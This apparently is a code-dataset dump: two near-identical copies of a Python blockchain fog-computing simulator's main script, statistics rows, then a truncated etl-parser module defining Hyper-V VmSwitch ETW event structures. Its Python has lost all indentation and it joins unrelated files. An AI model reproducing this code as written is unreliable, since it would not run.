import output
from math import ceil
import time
import modification
import new_consensus_module
data = modification.read_file("Sim_parameters.json")
list_of_end_users = []
fogNodes = []
transactions_list = []
list_of_authorized_miners = []
blockchainFunction = 0
blockchainPlacement = 0
number_of_miner_neighbours = data["number_of_each_miner_neighbours"]
NumOfFogNodes = data["NumOfFogNodes"]
NumOfTaskPerUser = data["NumOfTaskPerUser"]
NumOfMiners = data["NumOfMiners"]
numOfTXperBlock = data["numOfTXperBlock"]
num_of_users_per_fog_node = data["num_of_users_per_fog_node"]
blockchain_functions = ['1', '2', '3', '4']
blockchain_placement_options = ['1', '2']
expected_chain_length = ceil((num_of_users_per_fog_node * NumOfTaskPerUser * NumOfFogNodes) / numOfTXperBlock)
gossip_activated = data["Gossip_Activated"]
Automatic_PoA_miners_authorization = data["Automatic_PoA_miners_authorization?"]
Parallel_PoW_mining = data["Parallel_PoW_mining?"]
trans_delay = 0
delay_between_fog_nodes = data["delay_between_fog_nodes"]
delay_between_end_users = data["delay_between_end_users"]
poet_block_time = data['poet_block_time']
Asymmetric_key_length = data['Asymmetric_key_length']
number_of_DPoS_delegates = data['Num_of_DPoS_delegates']
def user_input():
modification.initiate_files(gossip_activated)
choose_functionality()
choose_placement()
def choose_functionality():
while True:
output.choose_functionality()
global blockchainFunction
blockchainFunction = input()
if blockchainFunction in blockchain_functions:
blockchainFunction = int(blockchainFunction)
break
else:
print("Input is incorrect, try again..!")
def choose_placement():
while True:
output.choose_placement()
global blockchainPlacement
blockchainPlacement = input()
if blockchainPlacement in blockchain_placement_options:
blockchainPlacement = int(blockchainPlacement)
break
else:
print("Input is incorrect, try again..!")
def initiate_network():
for count in range(NumOfFogNodes):
fogNodes.append(Fog.Fog(count + 1))
for p in range(num_of_users_per_fog_node):
list_of_end_users.append(end_user.User(p + 1, count + 1))
output.users_and_fogs_are_up()
if blockchainFunction == 4:
output.GDPR_warning()
while True:
print("If you don't want other attributes to be added to end_users, input: done\n")
new_attribute = input("If you want other attributes to be added to end_users, input them next:\n")
if new_attribute == 'done':
break
else:
for user in list_of_end_users:
user.identity_added_attributes[new_attribute] = ''
output.user_identity_addition_reminder(len(list_of_end_users))
for user in list_of_end_users:
user.create_tasks(NumOfTaskPerUser, blockchainFunction, list_of_end_users)
user.send_tasks(fogNodes)
print("End_user " + str(user.addressParent) + "." + str(
user.addressSelf) + " had sent its tasks to the fog layer")
def initiate_miners():
the_miners_list = []
if blockchainPlacement == 1:
for i in range(NumOfFogNodes):
the_miners_list.append(miner.Miner(i + 1, trans_delay, gossip_activated))
if blockchainPlacement == 2:
for i in range(NumOfMiners):
the_miners_list.append(miner.Miner(i + 1, trans_delay, gossip_activated))
for entity in the_miners_list:
modification.write_file("temporary/" + entity.address + "_local_chain.json", {})
miner_wallets_log_py = modification.read_file("temporary/miner_wallets_log.json")
miner_wallets_log_py[str(entity.address)] = data['miners_initial_wallet_value']
modification.rewrite_file("temporary/miner_wallets_log.json", miner_wallets_log_py)
print('Miners have been initiated..')
connect_miners(the_miners_list)
output.miners_are_up()
return the_miners_list
def define_trans_delay(layer):
transmission_delay = 0
if layer == 1:
transmission_delay = delay_between_fog_nodes
if layer == 2:
transmission_delay = delay_between_end_users
return transmission_delay
def connect_miners(miners_list):
print("Miners will be connected in a P2P fashion now. Hold on...")
bridges = set()
all_components = create_components(miners_list)
for comp in all_components:
bridge = random.choice(tuple(comp))
bridges.add(bridge)
bridging(bridges, miners_list)
def bridging(bridges, miners_list):
while len(bridges) != 1:
bridge = random.choice(tuple(bridges))
other_bridge = random.choice(tuple(bridges))
same_bridge = True
while same_bridge:
other_bridge = random.choice(tuple(bridges))
if other_bridge != bridge:
same_bridge = False
for entity in miners_list:
if entity.address == bridge:
entity.neighbours.add(other_bridge)
if entity.address == other_bridge:
entity.neighbours.add(bridge)
bridges.remove(bridge)
def create_components(miners_list):
all_components = set()
for entity in miners_list:
component = set()
while len(entity.neighbours) < number_of_miner_neighbours:
neighbour = random.choice(miners_list).address
if neighbour != entity.address:
entity.neighbours.add(neighbour)
component.add(neighbour)
for entity_2 in miners_list:
if entity_2.address == neighbour:
entity_2.neighbours.add(entity.address)
component.add(entity.address)
break
if component:
all_components.add(tuple(component))
return all_components
def give_miners_authorization(the_miners_list, the_type_of_consensus):
if the_type_of_consensus == 3:
# automated approach:
if Automatic_PoA_miners_authorization:
for i in range(len(the_miners_list)):
the_miners_list[i].isAuthorized = True
list_of_authorized_miners.append(the_miners_list[i])
else:
# user input approach:
output.authorization_trigger(blockchainPlacement, NumOfFogNodes, NumOfMiners)
while True:
authorized_miner = input()
if authorized_miner == "done":
break
else:
for node in the_miners_list:
if node.address == "Miner_" + authorized_miner:
node.isAuthorized = True
list_of_authorized_miners.append(node)
def initiate_genesis_block():
genesis_transactions = ["genesis_block"]
for i in range(len(miner_list)):
genesis_transactions.append(miner_list[i].address)
genesis_block = new_consensus_module.generate_new_block(genesis_transactions, 'The Network', 0,
type_of_consensus)
output.block_info(genesis_block, type_of_consensus)
for elem in miner_list:
elem.receive_new_block(genesis_block, type_of_consensus, miner_list, blockchainFunction,
expected_chain_length)
output.genesis_block_generation()
def send_tasks_to_BC():
for node in fogNodes:
node.send_tasks_to_BC()
def inform_miners_of_users_wallets():
if blockchainFunction == 3:
user_wallets = {}
for user in list_of_end_users:
wallet_info = {'parent': user.addressParent,
'self': user.addressSelf,
'wallet_value': user.wallet}
user_wallets[str(user.addressParent) + '.' + str(user.addressSelf)] = wallet_info
for i in range(len(miner_list)):
modification.rewrite_file(str("temporary/" + miner_list[i].address + "_users_wallets.json"),
user_wallets)
if __name__ == '__main__':
user_input()
initiate_network()
type_of_consensus = new_consensus_module.choose_consensus()
trans_delay = define_trans_delay(blockchainPlacement)
miner_list = initiate_miners()
give_miners_authorization(miner_list, type_of_consensus)
inform_miners_of_users_wallets()
blockchain.stake(miner_list, type_of_consensus)
initiate_genesis_block()
send_tasks_to_BC()
time_start = time.time()
if blockchainFunction == 2:
expected_chain_length = ceil((num_of_users_per_fog_node * NumOfTaskPerUser * NumOfFogNodes))
new_consensus_module.miners_trigger(miner_list, type_of_consensus, expected_chain_length, Parallel_PoW_mining,
numOfTXperBlock, blockchainFunction, poet_block_time, Asymmetric_key_length,
number_of_DPoS_delegates)
blockchain.award_winning_miners(len(miner_list))
blockchain.fork_analysis(miner_list)
output.finish()
elapsed_time = time.time() - time_start
print("elapsed time = " + str(elapsed_time) + " seconds")
import Fog
import end_user
import miner
import blockchain
import random
import output
from math import ceil
import time
import modification
import new_consensus_module
data = modification.read_file("Sim_parameters.json")
list_of_end_users = []
fogNodes = []
transactions_list = []
list_of_authorized_miners = []
blockchainFunction = 0
blockchainPlacement = 0
number_of_miner_neighbours = data["number_of_each_miner_neighbours"]
NumOfFogNodes = data["NumOfFogNodes"]
NumOfTaskPerUser = data["NumOfTaskPerUser"]
NumOfMiners = data["NumOfMiners"]
numOfTXperBlock = data["numOfTXperBlock"]
num_of_users_per_fog_node = data["num_of_users_per_fog_node"]
blockchain_functions = ['1', '2', '3', '4']
blockchain_placement_options = ['1', '2']
expected_chain_length = ceil((num_of_users_per_fog_node * NumOfTaskPerUser * NumOfFogNodes) / numOfTXperBlock)
gossip_activated = data["Gossip_Activated"]
Automatic_PoA_miners_authorization = data["Automatic_PoA_miners_authorization?"]
Parallel_PoW_mining = data["Parallel_PoW_mining?"]
trans_delay = 0
delay_between_fog_nodes = data["delay_between_fog_nodes"]
delay_between_end_users = data["delay_between_end_users"]
poet_block_time = data['poet_block_time']
Asymmetric_key_length = data['Asymmetric_key_length']
number_of_DPoS_delegates = data['Num_of_DPoS_delegates']
def user_input():
modification.initiate_files(gossip_activated)
choose_functionality()
choose_placement()
def choose_functionality():
while True:
output.choose_functionality()
global blockchainFunction
blockchainFunction = input()
if blockchainFunction in blockchain_functions:
blockchainFunction = int(blockchainFunction)
break
else:
print("Input is incorrect, try again..!")
def choose_placement():
while True:
output.choose_placement()
global blockchainPlacement
blockchainPlacement = input()
if blockchainPlacement in blockchain_placement_options:
blockchainPlacement = int(blockchainPlacement)
break
else:
print("Input is incorrect, try again..!")
def initiate_network():
for count in range(NumOfFogNodes):
fogNodes.append(Fog.Fog(count + 1))
for p in range(num_of_users_per_fog_node):
list_of_end_users.append(end_user.User(p + 1, count + 1))
output.users_and_fogs_are_up()
if blockchainFunction == 4:
output.GDPR_warning()
while True:
print("If you don't want other attributes to be added to end_users, input: done\n")
new_attribute = input("If you want other attributes to be added to end_users, input them next:\n")
if new_attribute == 'done':
break
else:
for user in list_of_end_users:
user.identity_added_attributes[new_attribute] = ''
output.user_identity_addition_reminder(len(list_of_end_users))
for user in list_of_end_users:
user.create_tasks(NumOfTaskPerUser, blockchainFunction, list_of_end_users)
user.send_tasks(fogNodes)
print("End_user " + str(user.addressParent) + "." + str(user.addressSelf) + " had sent its tasks to the fog layer")
def initiate_miners():
the_miners_list = []
if blockchainPlacement == 1:
for i in range(NumOfFogNodes):
the_miners_list.append(miner.Miner(i + 1, trans_delay, gossip_activated))
if blockchainPlacement == 2:
for i in range(NumOfMiners):
the_miners_list.append(miner.Miner(i + 1, trans_delay, gossip_activated))
for entity in the_miners_list:
modification.write_file("temporary/" + entity.address + "_local_chain.json", {})
miner_wallets_log_py = modification.read_file("temporary/miner_wallets_log.json")
miner_wallets_log_py[str(entity.address)] = data['miners_initial_wallet_value']
modification.rewrite_file("temporary/miner_wallets_log.json", miner_wallets_log_py)
print('Miners have been initiated..')
connect_miners(the_miners_list)
output.miners_are_up()
return the_miners_list
def define_trans_delay(layer):
transmission_delay = 0
if layer == 1:
transmission_delay = delay_between_fog_nodes
if layer == 2:
transmission_delay = delay_between_end_users
return transmission_delay
def connect_miners(miners_list):
print("Miners will be connected in a P2P fashion now. Hold on...")
bridges = set()
all_components = create_components(miners_list)
for comp in all_components:
bridge = random.choice(tuple(comp))
bridges.add(bridge)
bridging(bridges, miners_list)
def bridging(bridges, miners_list):
while len(bridges) != 1:
bridge = random.choice(tuple(bridges))
other_bridge = random.choice(tuple(bridges))
same_bridge = True
while same_bridge:
other_bridge = random.choice(tuple(bridges))
if other_bridge != bridge:
same_bridge = False
for entity in miners_list:
if entity.address == bridge:
entity.neighbours.add(other_bridge)
if entity.address == other_bridge:
entity.neighbours.add(bridge)
bridges.remove(bridge)
def create_components(miners_list):
all_components = set()
for entity in miners_list:
component = set()
while len(entity.neighbours) < number_of_miner_neighbours:
neighbour = random.choice(miners_list).address
if neighbour != entity.address:
entity.neighbours.add(neighbour)
component.add(neighbour)
for entity_2 in miners_list:
if entity_2.address == neighbour:
entity_2.neighbours.add(entity.address)
component.add(entity.address)
break
if component:
all_components.add(tuple(component))
return all_components
def give_miners_authorization(the_miners_list, the_type_of_consensus):
if the_type_of_consensus == 3:
# automated approach:
if Automatic_PoA_miners_authorization:
for i in range(len(the_miners_list)):
the_miners_list[i].isAuthorized = True
list_of_authorized_miners.append(the_miners_list[i])
else:
# user input approach:
output.authorization_trigger(blockchainPlacement, NumOfFogNodes, NumOfMiners)
while True:
authorized_miner = input()
if authorized_miner == "done":
break
else:
for node in the_miners_list:
if node.address == "Miner_" + authorized_miner:
node.isAuthorized = True
list_of_authorized_miners.append(node)
def initiate_genesis_block():
genesis_transactions = ["genesis_block"]
for i in range(len(miner_list)):
genesis_transactions.append(miner_list[i].address)
genesis_block = new_consensus_module.generate_new_block(genesis_transactions, 'The Network', 0, type_of_consensus)
output.block_info(genesis_block, type_of_consensus)
for elem in miner_list:
elem.receive_new_block(genesis_block, type_of_consensus, miner_list, blockchainFunction, expected_chain_length)
output.genesis_block_generation()
def send_tasks_to_BC():
for node in fogNodes:
node.send_tasks_to_BC()
def inform_miners_of_users_wallets():
if blockchainFunction == 3:
user_wallets = {}
for user in list_of_end_users:
wallet_info = {'parent': user.addressParent,
'self': user.addressSelf,
'wallet_value': user.wallet}
user_wallets[str(user.addressParent) + '.' + str(user.addressSelf)] = wallet_info
for i in range(len(miner_list)):
modification.rewrite_file(str("temporary/" + miner_list[i].address + "_users_wallets.json"), user_wallets)
def main_function():
user_input()
initiate_network()
type_of_consensus = new_consensus_module.choose_consensus()
trans_delay = define_trans_delay(blockchainPlacement)
miner_list = initiate_miners()
give_miners_authorization(miner_list, type_of_consensus)
inform_miners_of_users_wallets()
blockchain.stake(miner_list, type_of_consensus)
initiate_genesis_block()
send_tasks_to_BC()
time_start = time.time()
if blockchainFunction == 2:
expected_chain_length = ceil((num_of_users_per_fog_node * NumOfTaskPerUser * NumOfFogNodes))
new_consensus_module.miners_trigger(miner_list, type_of_consensus, expected_chain_length, Parallel_PoW_mining,
numOfTXperBlock, blockchainFunction, poet_block_time, Asymmetric_key_length,
number_of_DPoS_delegates)
blockchain.award_winning_miners(len(miner_list))
blockchain.fork_analysis(miner_list)
output.finish()
elapsed_time = time.time() - time_start
print("elapsed time = " + str(elapsed_time) + " seconds")
| 41.393312
| 184
| 0.628159
| 2,943
| 25,995
| 5.265036
| 0.114849
| 0.025815
| 0.018458
| 0.012649
| 0.770248
| 0.76244
| 0.759342
| 0.759342
| 0.759342
| 0.759342
| 0
| 0.004029
| 0.274284
| 25,995
| 627
| 185
| 41.45933
| 0.817334
| 0.010771
| 0
| 0.779886
| 1
| 0.003795
| 0.192464
| 0.038198
| 0
| 0
| 0
| 0
| 0
| 1
| 0.094877
| false
| 0.001898
| 0.037951
| 0
| 0.144213
| 0.140417
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4660adcfcbd99abbfdd8505ab169c661e78e26b4
| 135,717
|
py
|
Python
|
etl/parsers/etw/Microsoft_Windows_Hyper_V_VmSwitch.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 104
|
2020-03-04T14:31:31.000Z
|
2022-03-28T02:59:36.000Z
|
etl/parsers/etw/Microsoft_Windows_Hyper_V_VmSwitch.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 7
|
2020-04-20T09:18:39.000Z
|
2022-03-19T17:06:19.000Z
|
etl/parsers/etw/Microsoft_Windows_Hyper_V_VmSwitch.py
|
IMULMUL/etl-parser
|
76b7c046866ce0469cd129ee3f7bb3799b34e271
|
[
"Apache-2.0"
] | 16
|
2020-03-05T18:55:59.000Z
|
2022-03-01T10:19:28.000Z
|
# -*- coding: utf-8 -*-
"""
Microsoft-Windows-Hyper-V-VmSwitch
GUID : 67dc0d66-3695-47c0-9642-33f76f7bd7ad
"""
from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct
from etl.utils import WString, CString, SystemTime, Guid
from etl.dtyp import Sid
from etl.parsers.etw.core import Etw, declare, guid
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=1, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_1_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=2, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_2_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=3, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_3_0(Etw):
pattern = Struct(
"Status" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=4, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_4_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=5, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_5_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=6, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_6_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=7, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_7_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=8, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_8_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=9, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_9_0(Etw):
pattern = Struct(
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"Flags" / Int32ul,
"OwnerService" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=10, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_10_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=11, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_11_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=12, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_12_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=13, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_13_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=14, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_14_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=15, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_15_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=16, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_16_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=17, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_17_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=18, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_18_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=19, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_19_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=20, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_20_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=21, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_21_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=22, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_22_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=23, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_23_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=24, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_24_0(Etw):
pattern = Struct(
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=25, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_25_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"Port1NameLen" / Int32ul,
"Port1Name" / Bytes(lambda this: this.Port1NameLen),
"Port1FNameLen" / Int32ul,
"Port1FName" / Bytes(lambda this: this.Port1FNameLen),
"Port2NameLen" / Int32ul,
"Port2Name" / Bytes(lambda this: this.Port2NameLen),
"Port2FNameLen" / Int32ul,
"Port2FName" / Bytes(lambda this: this.Port2FNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=26, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_26_0(Etw):
pattern = Struct(
"VMNameLen" / Int32ul,
"VMName" / Bytes(lambda this: this.VMNameLen),
"VMIdLen" / Int32ul,
"VMId" / Bytes(lambda this: this.VMIdLen),
"ServerVersionLen" / Int32ul,
"ServerVersion" / Bytes(lambda this: this.ServerVersionLen),
"ClientVersionLen" / Int32ul,
"ClientVersion" / Bytes(lambda this: this.ClientVersionLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=28, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_28_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"Port1NameLen" / Int32ul,
"Port1Name" / Bytes(lambda this: this.Port1NameLen),
"Port1FNameLen" / Int32ul,
"Port1FName" / Bytes(lambda this: this.Port1FNameLen),
"Port2NameLen" / Int32ul,
"Port2Name" / Bytes(lambda this: this.Port2NameLen),
"Port2FNameLen" / Int32ul,
"Port2FName" / Bytes(lambda this: this.Port2FNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=29, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_29_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=30, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_30_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=31, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_31_0(Etw):
pattern = Struct(
"MacAddressLen" / Int32ul,
"MacAddress" / Bytes(lambda this: this.MacAddressLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen)
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=32, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_32_0(Etw):
pattern = Struct(
"Status" / Int32ul,
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
"SwitchName" / Bytes(lambda this: this.SwitchNameLen),
"SwitchFNameLen" / Int32ul,
"SwitchFName" / Bytes(lambda this: this.SwitchFNameLen),
"UniqueEvent" / Int32ul
)
@declare(guid=guid("67dc0d66-3695-47c0-9642-33f76f7bd7ad"), event_id=33, version=0)
class Microsoft_Windows_Hyper_V_VmSwitch_33_0(Etw):
pattern = Struct(
"VMNameLen" / Int32ul,
"VMName" / Bytes(lambda this: this.VMNameLen),
"NicNameLen" / Int32ul,
"NicName" / Bytes(lambda this: this.NicNameLen),
"NicFNameLen" / Int32ul,
"NicFName" / Bytes(lambda this: this.NicFNameLen),
"PortNameLen" / Int32ul,
"PortName" / Bytes(lambda this: this.PortNameLen),
"PortFNameLen" / Int32ul,
"PortFName" / Bytes(lambda this: this.PortFNameLen),
"SwitchNameLen" / Int32ul,
